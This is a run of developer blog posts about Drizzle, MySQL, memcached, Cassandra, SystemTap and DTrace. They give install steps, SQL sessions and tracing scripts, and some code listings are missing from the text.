I wanted to write some posts before the conference that I can reference within my talk which detail how to install SystemTap and configure Drizzle and MySQL for use with SystemTap. Thus, this post is on how to install SystemTap on Ubuntu while my next post will go in to details about how to configure MySQL and Drizzle for use with SystemTap.
Before starting, its worth noting that this post is specific to Ubuntu 9.10. The procedure to follow may be different on other versions so its worth keeping that in my mind. The first thing we do is install systemtap and some associated packages which will be needed by Drizzle and MySQL:

$ sudo apt-get install systemtap
$ sudo apt-get install systemtap-sdt-dev

Now, being used to Ubuntu, you would think you are good to go now. Unfortunately, attempting to run SystemTap will probably give you the following error:

$ stap -e 'probe kernel.function("sys_open") {log("hello world") exit()}'
semantic error: libdwfl failure (missing x86_64 kernel/module debuginfo under
'/lib/modules/2.6.31-19-generic/build'): No such file or directory while resolving probe point
kernel.function("sys_open")
semantic error: no probes found
Pass 2: analysis failed.  Try again with another '--vp 01' option.
$

The above error occurs because SystemTap needs to have a debug version of the kernel available. Unfortunately, installing the debug information for a kernel on ubuntu is not a trivial operation to perform. In fact, there is a bug on Launchpad about this issue. Thus, we will build a kernel debug package from source ourselves. This can be done as follows:

$ cd $HOME
$ sudo apt-get install dpkg-dev debhelper gawk
$ mkdir tmp
$ cd tmp
$ sudo apt-get build-dep --no-install-recommends linux-image-$(uname -r)
$ apt-get source linux-image-$(uname -r)
$ cd linux-2.6.31 (this is currently the kernel version of 9.10)
$ fakeroot debian/rules clean
$ AUTOBUILD=1 fakeroot debian/rules binary-generic skipdbg=false
$ sudo dpkg -i ../linux-image-debug-2.6.31-19-generic_2.6.31-19.56_amd64.ddeb

This builds a debug image of the kernel and so will take quite a while. Once we have the above completed, we can try running our hello world example with SystemTap again. In order to get some output, you should open or create some file on the system in another terminal window. In this example, I backgrounded the stap process and created a file:

$ sudo stap -e 'probe kernel.function("sys_open") {log("hello world") exit()}' &
[1] 951
$ touch /tmp/padraig
$ hello world
$ [1]+ Done

Installing SystemTap on CentOS is significantly easier since it is primarily developed by Red Hat. A good article on how to install it on CentOS is available here.
In my next post on the topic, I'll explain how to configure MySQL and Drizzle for SystemTap and give some simple examples of using SystemTap with them.

Using the C++ Interface with Cassandra

2010-02-22T00:00:00-08:00

Before starting, Cassandra needs to be downladed and installed. In a previous post, I went through the steps involved in setting up a Cassandra cluster so I'm not going to repeat that here. For this simple example though, I'll be using the following keyspace (which needs to be present in the storage-conf.xml file):

Once we have cassandra installed and running, we next need to download thrift from its Apache homepage. I went with the latest stable release which at the time of writing is 0.2.0. Installation from the tarball is pretty straightforward but ensure to run ldconfig after installing thrift.
Once thrift is installed, we need to generate the C++ interface for Cassandra (this will be done as the cassandra user if following the setup in my previous post):

$ cd $CASSANDRA_HOME/interface
$ thrift --gen cpp cassandra.thrift
$ ls -ltr
total 44
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 17:57 thrift
-rw-r--r-- 1 cassandra cassandra 21105 2010-02-22 17:57 cassandra.thrift
-rw-r--r-- 1 cassandra cassandra  3359 2010-02-22 17:57 cassandra.avpr
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 18:01 avro
drwxr-xr-x 2 cassandra cassandra  4096 2010-02-22 21:41 gen-cpp
$ mkdir cpp-test

Within the cpp-test directory, I'm going to create a file named simple-test.cc which looks like:

To compile this, I used the following command line (assuming I am in the cpp-test directory):

$ g++ -o cpptest -Wall -g \
> -I../gen-cpp/. \
> -I/usr/local/include/thrift \
> -L/usr/local/lib -lstdc++ -lthrift \
> simple-test.cc \
> ../gen-cpp/cassandra_constants.cpp \
> ../gen-cpp/cassandra_types.cpp \
> ../gen-cpp/Cassandra.cpp
$

The above command will produce an executable named cpptest in the cpp-test directory. Assuming cassandra is started, we run the binary and should obtain output like so:

$ ./cpptest 
Column name retrieved is: second
Value in column retrieved is: this is data!!
$

That's a simple example of using the C++ interface to Cassandra. Hopefully, this will prove useful to someone but it took me longer than expected to get the above simple test working so I figured it was worth writing up the steps I went through.

New Job at Akiban

2010-02-06T00:00:00-08:00

I just finished my first week at my new position as a software engineer at Akiban Technologies in Boston.

I’m really excited about working here. Akiban is a small startup developing some really cool technology that I believe will get people talking about the relational model in a good way again. We are currently based in the South End of Boston. The building where we are located is pretty awesome and not at all what I pictured an office to be like. There is a resident artist in the building who hangs his paintings on the walls and they seem to move to different places at random times. Its a strange feeling to walk in to work in the morning and smell fresh paint as I go to my desk. Definitely not something I expected!

But besides all that, one of the best things for me about working here is that I get paid to contribute to open source. I’ve been pretty involved with Drizzle for the last year while still a student and it was always something I really enjoyed which I never thought someone would pay me to work on. The community around the project is awesome and I was just happy to be involved with it. Now that I get paid to contribute, it’s nice to know that I can still be part of that community without having to worry about how I’m going to make a living. It’s weird to be paid for something that I would still be doing anyway without the pay! I’m not complaining though, it’s a nice change!

I’ll be presenting at the MySQL conference in April, lots of awesome work is happening in the Drizzle project and Akiban will be out of stealth mode by the conference so there are some exciting times ahead!

Moved to GitHub Pages

2010-01-28T00:00:00-08:00

I decided to move my blog to a new hosting provider - GitHub Pages. The blogging software used with GitHub is Jekyll.
I really like the fact that everything is done via a git repository. So far, I really like this setup.

S3 Storage Engine with Memcached in Drizzle

2009-11-09T00:00:00-08:00

Previously, I had ported Brian's memcached engine to Drizzle and rencently, I've been doing some work with Amazon's S3 for school. Thus, I decided to have a look at Mark's S3 storage engine for MySQL. Over the last 2 days, I created a new version of the S3 storage engine for Drizzle with the option to use Memcached as a write-through cache for the S3 backend store. I see this work more as showing the cool things we can do in Drizzle and how quickly we can get prototypes up and running. I don't even know if this is a good idea or anything but its cool to be able to store all data in S3.
First, lets see how to create a table with this engine. The one constraint on tables created with this engine is that they need to have a primary key specified on the table. Each table that is created in this engine is represented as a bucket in S3. So whenever you create a table with this engine, you create a bucket in S3. So lets try creating a table:

drizzle> create database demo;
Query OK, 1 row affected (0 sec)

drizzle> use demo;
Database changed
drizzle> create table padara (
    -> a int primary key,
    -> b varchar(255),
    -> c varchar(255)) engine=mcaws;
ERROR 1005 (HY000): Can't create table 'demo.padara' (errno: 1005)
drizzle>

Lets get some more information on why that table creation failed:

drizzle> show warnings;
+-------+------+-------------------------------------------------------------------------------------+
| Level | Code | Message                                                                             |
+-------+------+-------------------------------------------------------------------------------------+
| Error | 1005 | Amazon S3 Connection Pool has not been created (Did you specify your credentials?)
 |
| Error | 1005 | Can't create table 'demo.padara' (errno: 1005)                                      |
+-------+------+-------------------------------------------------------------------------------------+
2 rows in set (0 sec)

drizzle>

As you see, we need to specify our Amazon AWS access credentials before we can utilize this store engine. For the moment, I have the following system variables associated with this plugin:

drizzle> show variables like '%AWS%';
+-----------------------+-------+
| Variable_name         | Value |
+-----------------------+-------+
| mcaws_accesskey       |       |
| mcaws_mcservers       |       |
| mcaws_secretaccesskey |       |
+-----------------------+-------+
3 rows in set (0 sec)

drizzle>

So I set the AWS access credentials by setting the appropriate system variables (this has to be done before tables can be created with this engine and in this order):

drizzle> set global mcaws_accesskey = 'YOUR_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle> set global mcaws_secretaccesskey = 'YOUR_SECRET_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle> show variables like '%AWS%';
+-----------------------+------------------------------------------+
| Variable_name         | Value                                    |
+-----------------------+------------------------------------------+
| mcaws_accesskey       | YOUR_ACCESS_KEY                     |
| mcaws_mcservers       |                                          |
| mcaws_secretaccesskey | YOUR_SECRET_ACCESS_KEY |
+-----------------------+------------------------------------------+
3 rows in set (0 sec)

drizzle>

Before creating the table, lets look at what buckets are associated with my S3 account. I'm going to use the S3Fox firefox plugin for this (there is multiple other things you could use). Here are the buckets in my S3 account right now:

I just have the one bucket for now. Now, I create a table using the S3 engine after specifying my AWS credentials:

drizzle> create table padara (
    -> a int primary key,
    -> b varchar(255),
    -> c varchar(255)) engine=mcaws;
Query OK, 0 rows affected (0.31 sec)

drizzle>

and when I look at my buckets in S3, I should see a new bucket representing the new table I created:

As can be seen, the bucket name is the database name concatenated with the table name - 'databasetable'. Next, lets insert some rows in the table and then see what objects are in the bucket:

drizzle> insert into padara
    -> values (1, 'padraig', 'sullivan');
Query OK, 1 row affected (0.07 sec)

drizzle> insert into padara
    -> values (2, 'domhnall', 'sullivan');
Query OK, 1 row affected (0.08 sec)

drizzle> insert into padara
    -> values (3, 'tomas', 'sullivan');
Query OK, 1 row affected (0.14 sec)

drizzle>

Now we can query the table. Queries on the table need to specify a primary key value in the WHERE clause for now so we will just be returning one row (I'll be looking into range queries pretty soon):

drizzle> select *
    -> from padara
    -> where a = 2;
+---+----------+----------+
| a | b        | c        |
+---+----------+----------+
| 2 | domhnall | sullivan |
+---+----------+----------+
1 row in set (5 sec)

drizzle>

That's basically the simple S3 engine. It works just like a regular storage engine except the data is stored on S3. Of course, the latency involved in interacting with S3 for every request can be quite limiting. For example, the simple query above took 5 seconds to retrieve the data. Thus, I added support for using memcached as a write-through cache for this engine. All we need to do is specify the memcached servers to use in the appropriate system variable:

drizzle> set global mcaws_mcservers = 'localhost:19191';
Query OK, 0 rows affected (0 sec)

drizzle>

Now, whenever we query a table created in this engine, we will check for the data in memcached first and if we miss in the cache, only then do we go to S3 for the data. When inserting new data, we insert it in both memcached and S3. Using memcached for this engine is totally optional. It can simply be used as a way to store data in S3 through the engine interface but I thought it might prove to be a useful option for an engine like this.
I wanted to show how clean the code to implement the functionality to do this in the plugin is. This goes to show the benefit of the great build system Monty Taylor has put a lot of work in to in Drizzle. I can easily utilize external libraries in my plugin - in this case libmemcached and libaws. The code below first checks for data in memcached and if it is not present there, retrieves the data from S3 and updates memcached before returning to the engine.

So thats about it for now. In the future, there are a few things I plan on working on for this engine:

removing the need to have a table represented as a bucket in S3 (this design makes the code much simpler for now)

increasing the size of the objects transferred from/to S3 - make the unit of transfer between the engine a page instead of a row as it is now

create I_S tables for monitoring S3 usage

add support for range queries

remove the need for a table to have a primary key

If you are interested in downloading the branch and playing with it, you can get it and build it by:

$ bzr branch lp:~posulliv/drizzle/aws-mc-engine
$ cd aws-mc-engine
$ ./config/autorun.sh && ./configure && make

libmemcached and libaws are prequisites that you will need installed before compiling this plugin. If anyone has any feedback or suggestions on what to do with this, that would be awesome. I really have no idea what to do with it!

Viewing Memcached Statistics from Drizzle

2009-09-29T00:00:00-07:00

While working on a few memcached related plugins for Drizzle, I noticed that it would be nice to have the ability to query memcached statistics from an INFORMATION_SCHEMA table. Today I put together a plugin that adds 2 memcached related I_S tables to drizzle. First, lets see the tables the plugin adds to drizzle along with the columns in each table:

drizzle> select table_name
    -> from information_schema.tables
    -> where table_name like '%MEMCACHED%';
+--------------------+
| table_name         |
+--------------------+
| MEMCACHED_STATS    | 
| MEMCACHED_ANALYSIS | 
+--------------------+
2 rows in set (0 sec)

drizzle> desc information_schema.memcached_stats;
+-----------------------+-------------+------+-----+---------+-------+
| Field                 | Type        | Null | Key | Default | Extra |
+-----------------------+-------------+------+-----+---------+-------+
| NAME                  | varchar(32) | NO   |     |         |       | 
| PORT_NUMBER           | bigint      | NO   |     | 0       |       | 
| PROCESS_ID            | bigint      | NO   |     | 0       |       | 
| UPTIME                | bigint      | NO   |     | 0       |       | 
| TIME                  | bigint      | NO   |     | 0       |       | 
| VERSION               | varchar(8)  | NO   |     |         |       | 
| POINTER_SIZE          | bigint      | NO   |     | 0       |       | 
| RUSAGE_USER           | bigint      | NO   |     | 0       |       | 
| RUSAGE_SYSTEM         | bigint      | NO   |     | 0       |       | 
| CURRENT_ITEMS         | bigint      | NO   |     | 0       |       | 
| TOTAL_ITEMS           | bigint      | NO   |     | 0       |       | 
| BYTES                 | bigint      | NO   |     | 0       |       | 
| CURRENT_CONNECTIONS   | bigint      | NO   |     | 0       |       | 
| TOTAL_CONNECTIONS     | bigint      | NO   |     | 0       |       | 
| CONNECTION_STRUCTURES | bigint      | NO   |     | 0       |       | 
| GETS                  | bigint      | NO   |     | 0       |       | 
| SETS                  | bigint      | NO   |     | 0       |       | 
| HITS                  | bigint      | NO   |     | 0       |       | 
| MISSES                | bigint      | NO   |     | 0       |       | 
| EVICTIONS             | bigint      | NO   |     | 0       |       | 
| BYTES_READ            | bigint      | NO   |     | 0       |       | 
| BYTES_WRITTEN         | bigint      | NO   |     | 0       |       | 
| LIMIT_MAXBYTES        | bigint      | NO   |     | 0       |       | 
| THREADS               | bigint      | NO   |     | 0       |       | 
+-----------------------+-------------+------+-----+---------+-------+
24 rows in set (0 sec)

drizzle> desc information_schema.memcached_analysis;
+--------------------------------+-------------+------+-----+---------+-------+
| Field                          | Type        | Null | Key | Default | Extra |
+--------------------------------+-------------+------+-----+---------+-------+
| SERVERS_ANALYZED               | bigint      | NO   |     | 0       |       | 
| AVERAGE_ITEM_SIZE              | bigint      | NO   |     | 0       |       | 
| NODE_WITH_MOST_MEM_CONSUMPTION | varchar(32) | NO   |     |         |       | 
| USED_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LEAST_FREE_SPACE     | varchar(32) | NO   |     |         |       | 
| FREE_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LONGEST_UPTIME       | varchar(32) | NO   |     |         |       | 
| LONGEST_UPTIME                 | bigint      | NO   |     | 0       |       | 
| POOL_WIDE_HIT_RATIO            | bigint      | NO   |     | 0       |       | 
+--------------------------------+-------------+------+-----+---------+-------+
9 rows in set (0.01 sec)

drizzle>

You might wonder how you specify the memcached servers to obtain statistics on. Well, I created a system variable for that purpose:

drizzle> show variables like '%memcached%';
+-------------------------+-------+
| Variable_name           | Value |
+-------------------------+-------+
| memcached_stats_servers |       | 
+-------------------------+-------+
1 row in set (0 sec)

drizzle>

Now, lets set the system variable to a small memcached instance I have running on my laptop:

drizzle> set global memcached_stats_servers = 'localhost:11211';
Query OK, 0 rows affected (0 sec)

drizzle> show variables like '%memcached%';
+-------------------------+-----------------+
| Variable_name           | Value           |
+-------------------------+-----------------+
| memcached_stats_servers | localhost:11211 | 
+-------------------------+-----------------+
1 row in set (0 sec)

drizzle>

And lets do a simple query on the MEMCACHED_STATS table:

drizzle> select name, port_number, version, gets, sets, hits, misses
    -> from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
+----------------------------------+-------------+----------+------+------+------+--------+
1 row in set (0 sec)

drizzle>

The MEMCACHED_ANALYSIS table is not interesting unless there is more than 1 memcached server specified in the system variable. Thus, we need to update that system variable first:

drizzle> set global memcached_stats_servers = 'localhost:11211, localhost:11212';
Query OK, 0 rows affected (0 sec)

drizzle>

Now, lets do the same query on MEMCACHED_STATS again:

drizzle> select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    0 |    0 |    0 |      0 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0 sec)

drizzle>

So you can see that for each server you specify in the system variable, a row will be output in the table. I'm going to make some activity happen in the second memcached instance I just started on my machine. Another branch I created over the last few days is a port of Brian's memcached engine to drizzle. So I'm going to create a table using the memcached engine and then insert some data into that table:

drizzle> create table test_data (
    -> a int primary key,
    -> b int,
    -> c varchar(64))
    -> engine=memcached;
Query OK, 0 rows affected (0.01 sec)

drizzle> insert into test_data
    -> values (1, 2, "this will be stored in memcached");
Query OK, 1 row affected (0.01 sec)

drizzle> select b, c 
    -> from test_data
    -> where a = 1;
+------+----------------------------------+
| b    | c                                |
+------+----------------------------------+
|    2 | this will be stored in memcached | 
+------+----------------------------------+
1 row in set (0 sec)

drizzle> select b, c  from test_data where a = 2;
Empty set (0 sec)

drizzle>

Now, lets query the statistics again:

drizzle> select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    2 |    1 |    1 |      1 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0.01 sec)

drizzle>

And we can see they have been updated as expected. Now, lets look at the MEMCACHED_ANALYSIS table. I'm just going to query the first 2 columns of this table:

drizzle> select servers_analyzed, average_item_size
    -> from information_schema.memcached_analysis;
+------------------+-------------------+
| servers_analyzed | average_item_size |
+------------------+-------------------+
|                2 |                86 | 
+------------------+-------------------+
1 row in set (0 sec)

drizzle>

There will always just be one row in the output from this table. It essentially mimics the functionality of the memstat client utility in libmemcached. I'm not too sure what what to do with this patch at the moment. If people are interested, I can propose it for merging into Drizzle so that it will be available as a plugin.

Using Memcached with C++

2009-09-19T00:00:00-07:00

For some plugins I am working on for Drizzle, I am using the libmemcached API. However, the C++ interface for libmemcached was quite simple and not really C++ so we have updated it a little bit in the last few months since drizzle is written in C++ and it would be nice to use a more C++-like interface in libmemcached. In this post, I'll show some simple sample usage of the libmemcached C++ interface based on this article about using memcached with Java. Please note that not all this functionality is in the latest stable version of libmemcached but it will likely be in the next release.

Installation

I am going to assume that memcached is already installed (see here for a good guide to installing it). To obtain libmemcached, we can either obtain the latest version of the source from launchpad, download an RPM, or download a tarball of the latest stable release and build that. I'm going to go with downloading a tarball since not everyone might have bzr installed. The latest stable release can be obtained from here.

$ cd libmemcached-0.32
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig

Basic Usage

The API is very similar to the C API except more suited to C++. Some simple examples of constructing a memcached client are shown:

There are many more methods available than the 3 listed above but for most simple applications, those 3 should get you pretty far. We still need to add documentation for the C++ interface which should also be included in the next stable release of libmemcached.

MyCache Singleton

As done in the Java article, I create a wrapper around the memcached client as so:

The DeletePtrs class is simply a generic function object that deletes the pointers in an STL container. I use this to delete all the Memcache objects in the vector before it is destroyed to ensure I don't have a memory leak (have a look at item 7 in Meyer's Effective STL for more information).

Sample Usage

Below, we show some samples of using the MyCache singleton. We assume that Product is some class that has been developed elsewhere that we want to cache.

That's about it really. As you can see, the C++ interface has been improved in libmemcached. There is still some more work needed on the C++ interface but I think its starting to look a lot better.

Using DTrace with Drizzle

2009-09-14T00:00:00-07:00

Over the weekend, I was reading about the DTrace support in MySQL and realized that the DTrace support in drizzle needed to be updated. Thus, I created a branch and went to work on porting the latest probes from MySQL 6.0 to drizzle. I proposed a branch for merging into trunk which contains most of the relevant static probes along with some small build fixes to ensure that the probes are correctly enabled. Hopefully, this branch will get merged in the next week or two. In this post, I'm going to give some really simple examples of using the static probes in drizzle along with pointers to various places where lots more information can be obtained on using dtrace (mostly with MySQL but it all applies to drizzle too really).

Building Drizzle with DTrace Support

First of all, the drizzle binary built on a platform with dtrace is not configured with dtrace support by default. Thus, we need to configure drizzle by passing it the --enable-dtrace option. The rest of the build and installation process is the same as normal. Note that I have not tested dtrace support on OSX and I believe it probably does not work correctly at the moment. This is something I'll aim to fix (with help from Monty) in the next few weeks.

To verify that the probes were built correctly, you should get similar output when listing the probes available in dtrace:

$ pfexec dtrace -l | grep drizzle | c++filt 
62444 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-done
62445 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-start
62446 drizzle11722          drizzled void Session::awake(Session::killed_state) connection-done
62447 drizzle11722          drizzled                 end_thread_signal connection-done
62448 drizzle11722          drizzled       void close_connections() connection-done
62449 drizzle11722          drizzled        bool Session::schedule() connection-start
62450 drizzle11722          drizzled bool mysql_delete(Session*,TableList*,Item*,st_sql_list*,unsigned long,unsigned long,bool) delete-done
62451 drizzle11722          drizzled bool drizzled::statement::Delete::execute() delete-start
62452 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-done
62453 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-start
62454 drizzle11722          drizzled bool mysql_insert(Session*,TableList*,List&,List&,List&,List&,enum_duplicates,bool) insert-done
62455 drizzle11722          drizzled     void select_insert::abort() insert-select-done
62456 drizzle11722          drizzled  bool select_insert::send_eof() insert-select-done
62457 drizzle11722          drizzled bool drizzled::statement::InsertSelect::execute() insert-select-start
62458 drizzle11722          drizzled bool drizzled::statement::Insert::execute() insert-start
62459 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-done
62460 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-done
62461 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-start
62462 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-done
62463 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-start
62465 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-start
62466 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-done
62467 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-start
62468 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&,List&,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-done
62469 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&,List&,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-start
$

Example Usage

I'm just going to show some sample scripts that I obtained from various other sources (these sources are listed later) related to DTrace with MySQL. The first simple script we will try measures query execution time (this does not include time for parsing):

#!/usr/sbin/dtrace -s

#pragma ident   "%Z%%M% %I%     %E% SMI"

#pragma D option quiet
#pragma D option switchrate=10

dtrace:::BEGIN
{
        printf(" %-16s %5s %3s %s\n", "DATABASE", "ms",
            "RET", "QUERY");
}

drizzle*:::query-exec-start
{
        self->start = timestamp;
        this->query = copyinstr(arg0);
        this->db = arg2 ? copyinstr(arg2) : ".";
}

drizzle*:::query-exec-done
/self->start/
{
        this->elapsed = (timestamp - self->start) / 1000000;
        printf(" %-16.16s %5d %3d %-32.32s\n",
            this->db, this->elapsed, (int)arg0, this->query);
        self->start = 0;
}

The output from running that script on a toy instance of drizzle (unfortunately, I'm still a student so don't get to administer or play with any real databases) where I was running small queries is:

$ pfexec dtrace -qp `pgrep drizzled` -s ./qestat.d
 DATABASE            ms RET QUERY
                      0   0 select @@version_comment limit 1
                      0   0 show databases
                      0   0 SELECT DATABASE()
 test                 0   0 show databases
 test                 0   0 show tables
 test                 0   0 show tables
 test                 0   0 select * from t1
 test                 5   0 create table t1(a int)
 test                 0   0 insert into t1 values (5), (6),
 test                 0   0 select * from t1
 test                 0   0 select a from t1 where a = 7
^C
$

Next, lets write a simple script that uses the filesort probe:

#!/usr/sbin/dtrace -s

#pragma ident   "%Z%%M% %I%     %E% SMI"

#pragma D option quiet
#pragma D option switchrate=10

drizzle$target:::query-start
{
  self->query = copyinstr (arg0);
  self->query_start = timestamp ;
}

drizzle$target:::filesort-start
{
  self->filesort_start = timestamp;
}

drizzle$target:::filesort-done
{
  self->filesort = timestamp - self->filesort_start;
}

drizzle$target:::query-done
/ self->query != 0 /
{
  printf("%s\n", self->query);
  printf("Total: %dus Filesort: %dus\n",
            (timestamp - self->query_start) / 1000,
            self->filesort / 1000);
  self->query = 0;
}

The output from running that is (again, I have no data to play with here):

$ pfexec dtrace -qp `pgrep drizzled` -s ./filesort.d
select @@version_comment limit 1
Total: 148us Filesort: 0us
show databases
Total: 595us Filesort: 0us
SELECT DATABASE()
Total: 114us Filesort: 0us
show databases
Total: 348us Filesort: 0us
show tables
Total: 274us Filesort: 0us
show fields in 't1'
Total: 112us Filesort: 0us
show tables
Total: 402us Filesort: 0us
select * from t1
Total: 292us Filesort: 0us
select * from t1 order by a
Total: 384us Filesort: 116us
^C
$

There is lots more that can be done. Have a look at the resources below for many more examples that can be tried out on drizzle. I'm just beginning to play with DTrace in my spare time really so I'm not aware of all its capabilities and use cases. It would be cool to see something similar to the DTrace Toolkit for drizzle though (like the Drizzle DTrace Toolkit...DDT).

More Information

A lot of articles and presentations have been produced on using DTrace with MySQL. Since the current probes in drizzle are just copied from MySQL, those are articles and presentations are still pretty useful to read if you want to play around with the dtrace probes in drizzle. Here are some good ones that I have come across:

DTrace Support in MySQL: Guide to Solving Real-life Performance Problems
Deep-inspecting MySQL with DTrace
Using DTrace with MySQL
Getting Started with DTracing MySQL
DTrace Database Topics (from the Solaris Internals wiki)

Future Work

This is really just the beginning of adding dtrace support to drizzle. The largest issues right now are build related and ensuring that everything works correctly on both Solaris and OSX. The static probes that I defined were all copied from MySQL with some tiny modifications in places. I'd like to know what kind of probes other people would like to see? Does anyone have any suggestions or ideas? I'd really like to hear from people who actually administer databases on what they would like to see.

From a drizzle developer's perspective, one thing I hope to see in the future is the ability for plugins to add static probes if they wish. I also need to add the probes in the handler. The only reason those are not present at the moment is due to some build related issues that I hope to resolve in the next few weeks.

Building a Small Cassandra Cluster for Testing and Development

2009-09-07T00:00:00-07:00

For college, I was playing with cassandra and thought I would document my experience in setting up a small cassandra cluster for playing around with. For this article, I actually used virtual machines (3 of them). I am assuming that we have a fresh ubuntu installation on each node. I'm also assuming static IP addresses so the /etc/hosts file on each node will have the following entries (the actual IP addresses and host names can be whatever you like):

192.168.221.138 cass01                  cass01
192.168.221.139 cass02                  cass02
192.168.221.140 cass03                  cass03

The process that I follow is to perform all the actions I outline below on one node and before actually starting the cassandra service, I clone the virtual machine as many times as I want. This makes it extremely quick for me to get up and running. I'm not going to go into detail on these issues here as there is plenty of information on these topics elsewhere (which go in to a lot more detail).

Required Packages

Cassandra requires very little to run:

Java 1.6
Ant
svn or git (only if you wish to obtain the latest code from trunk)

These packages can be installed easily:

$ sudo apt-get install sun-java6-jdk ant git-core

Create "cassandra" User and Directories

The following tasks will be performed on all nodes that we want to be in the cluster (what I do is to perform these actions on just 1 virtual machine and then clone the virtual machine multiple times). We are going to create a user account and group that cassandra will run as.

$ sudo groupadd -g 501 cassandra
$ sudo useradd -m -u 501 -g cassandra -d /home/cassandra -s /bin/bash \
> -c "Cassandra Software Owner" cassandra
$ id cassandra
uid=1001(cassandra) gid=501(cassandra) groups=501(cassandra)
$ sudo passwd cassandra

Next, we create directories for storing the software, data, commit logs, and configuration files.

$ sudo mkdir -p /opt/cassandra
$ sudo mkdir -p /opt/cassandra/source
$ sudo mkdir -p /opt/cassandra/logs
$ sudo mkdir -p /opt/cassandra/callouts
$ sudo mkdir -p /opt/cassandra/bootstrap
$ sudo mkdir -p /opt/cassandra/staging
$ sudo mkdir -p /opt/cassandra/conf
$ sudo mkdir -p /u01/cassandra/data
$ sudo mkdir -p /u02/cassandra/commitlog
$ sudo chown -R cassandra:cassandra /opt/cassandra
$ sudo chown -R cassandra:cassandra /u01/cassandra
$ sudo chown -R cassandra:cassandra /u02/cassandra
$ sudo chmod -R 755 /var/cassandra
$ sudo chmod -R 755 /u01/cassandra
$ sudo chmod -R 755 /u02/cassandra

Above, we are making an assumption that /u01 and /u02 would be separate disks. Of course, I do not have separate disks but in reality, that the ideal scenario would be to store the commit logs and data on separate disks as alluded to above. In order to make administration easier, we add the following the cassandra user's .bashrc file (or .bash_profile):

export JAVA_HOME=/usr/lib/jvm/java-6-sun

export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_PATH=$CASSANDRA_HOME/bin

export PATH=$CASSANDRA_PATH:$PATH

Obviously, the various environment variables should be set to whatever is appropriate for your environment if you are deviating from what I am setting up here.

Download Cassandra

download cassandra (we will use git in this article) There are a number of options for downloading cassandra:

Running the latest code in trunk is not recommended as it is not a stable release. However, I'm going to use the latest version of the repository (cloned from the git read-only repository) for this article as I'm interested in following the development of cassandra. Thus, I'll use git to retrieve the latest code:

$ su - cassandra
$ cd /opt/cassandra/source
$ git clone git://git.apache.org/cassandra.git latest

Build and Configure Cassandra

Now, we need to build the software:

$ su - cassandra
$ cd $CASSANDRA_HOME
$ ant
Buildfile: build.xml

build-subprojects:

init:
    [mkdir] Created dir: /opt/cassandra/source/latest/build/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/build/test/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/src/gen-java

check-gen-cli-grammar:

gen-cli-grammar:
     [echo] Building Grammar /opt/cassandra/source/latest/src/java/org/apache/cassandra/cli/Cli.g  ....

build-project:
     [echo] apache-cassandra-incubating: /opt/cassandra/source/latest/build.xml
    [javac] Compiling 254 source files to /opt/cassandra/source/latest/build/classes
    [javac] Note: Some input files use or override a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

build:

BUILD SUCCESSFUL
Total time: 10 seconds
$

We would like to be able to keep configuration files out of the main source tree so we copy the sample configuration files provided with the source to a particular configuration directory we maintain for cassandra:

$ cp -R $CASSANDRA_HOME/conf/* $CASSANDRA_CONF
$ cp $CASSANDRA_HOME/bin/cassandra.in.sh $CASSANDRA_INCLUDE
$ cd $CASSANDRA_CONF
$ ls -l
total 24
-rw-r--r-- 1 cassandra cassandra  1886 2009-09-05 16:05 cassandra.in.sh
-rw-r--r-- 1 cassandra cassandra  1664 2009-09-05 14:51 log4j.properties
-rw-r--r-- 1 cassandra cassandra 13926 2009-09-05 14:51 storage-conf.xml
$

